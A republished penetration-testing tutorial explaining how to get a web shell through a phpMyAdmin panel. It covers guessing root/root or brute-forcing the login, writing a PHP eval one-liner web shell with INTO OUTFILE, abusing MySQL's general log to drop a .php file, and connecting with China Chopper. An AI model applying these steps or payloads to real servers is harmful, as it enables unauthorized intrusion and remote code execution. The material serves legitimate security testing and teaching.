Home > Database > phpMyAdmin > PhpMyAdmin background getshell (penetration test)

PhpMyAdmin background getshell (penetration test)

藏色散人
Release: 2021-06-18 18:15:22
forward
3485 people have browsed it

The following is the tutorial column of phpmyadmin to introduce you to PhpMyAdmin background getshell (penetration test). I hope it will be helpful to friends in need!

PhpMyAdmin Introduction

PhpMyAdmin is based on PHP and structured in Web-Base. The MySQL database management tool on the website host allows administrators to use the Web interface to manage the MySQL database. This web interface can be a better way to input complex SQL syntax in a simple way, especially when it comes to importing and exporting large amounts of data.
PhpMyAdmin background getshell (penetration test)
After collecting and detecting the target information, when it is found that the phpmyadmin directory exists (try: http://ip:port/phpmyadmin/), then After entering the management background through a weak password (, you can directly try the account root password root) or brute force cracking, there are many ways to getshell.
PhpMyAdmin background getshell (penetration test)

into outfile export Trojan

If you want to insert a Trojan inside the website, the premise is that you have to know the absolute path of the website. There are many methods, such as obtaining the path by reporting an error, and passing phpinfo.php and so on (please refer to another blog post: https://blog.csdn.net/weixin_39190897/article/details/99078864).

The most convenient way is to use select @@basedir; to check directly (but sometimes you can’t find it out, you can only find other methods):
PhpMyAdmin background getshell (penetration test)

According to the above feedback, we can see that the location of MySQL is in the D:\soft\phpStudy\MySQL\ directory.

After obtaining the website path, you can attempt to upload the Trojan. The most commonly used method is to write a sentence of Trojan directly on the root directory of the website through into outfile:

select '<?php eval($_POST[cmd]); ?>' into outfile 'D:\soft\phpStudy\www\xxx.php';

But in the new version In mysql, this sentence did not run successfully.
PhpMyAdmin background getshell (penetration test)
Mysql new features secure_file_priv will have an impact on reading and writing files. This parameter is used to limit import and export. We can use the show global variables like '%secure%'; command to view this parameter:
PhpMyAdmin background getshell (penetration test)
When secure_file_priv is NULL, it means that Mysql is not restricted Import and export are allowed, so an error occurs. To make the statement export successfully, you need to modify the my.ini file in the Mysql folder and add secure_file_priv ="" to [mysqld]:
PhpMyAdmin background getshell (penetration test)
When the value of secure_file_priv has no specific value, it means that there is no restriction on the import|export of mysqld, and the export command can be executed at this time.

Using Mysql log files

Mysql version 5.0 and above will create log files, and you can also getshell by modifying the global variables of the log. But you must also have read and write permissions on the generated logs. (Note: The personal test on Linux was unsuccessful due to permission issues). First, let’s introduce two MySQL global variables: general_log and general_log file.

  1. general log refers to the log saving status, ON means open, OFF means closed;
  2. general log file refers to the log save path.

Command to view log status: show variables like '%general%';
PhpMyAdmin background getshell (penetration test)## In the above configuration, when general is turned on,
The executed sql statements will appear in the WIN-30DFNC8L78A.log file.

Then, if the value of general_log_file is modified, the executed sql statement will be generated correspondingly, and then getshell will be generated.
PhpMyAdmin background getshell (penetration test)PhpMyAdmin background getshell (penetration test)
Correspondingly, the xxx.php file will be generated
PhpMyAdmin background getshell (penetration test)
Write a sentence Trojan into the xxx.php file: SELECT '<?php eval ($_POST["cmd"]);?>'
PhpMyAdmin background getshell (penetration test)
Then you can see the Trojan horse statements recorded in the log file:
PhpMyAdmin background getshell (penetration test)Finally, China Chopper connects, getshell :
PhpMyAdmin background getshell (penetration test)

The above is the detailed content of PhpMyAdmin background getshell (penetration test). For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:csdn.net
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template